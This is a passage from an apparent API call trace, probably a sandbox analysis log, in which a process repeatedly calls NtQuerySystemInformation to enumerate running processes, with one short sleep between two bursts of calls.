ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xeb10) returned 0x0 [0210.610] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0213.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.130] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.131] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.133] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.179] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.191] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.192] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.204] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.238] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe510) returned 0x0 [0213.241] 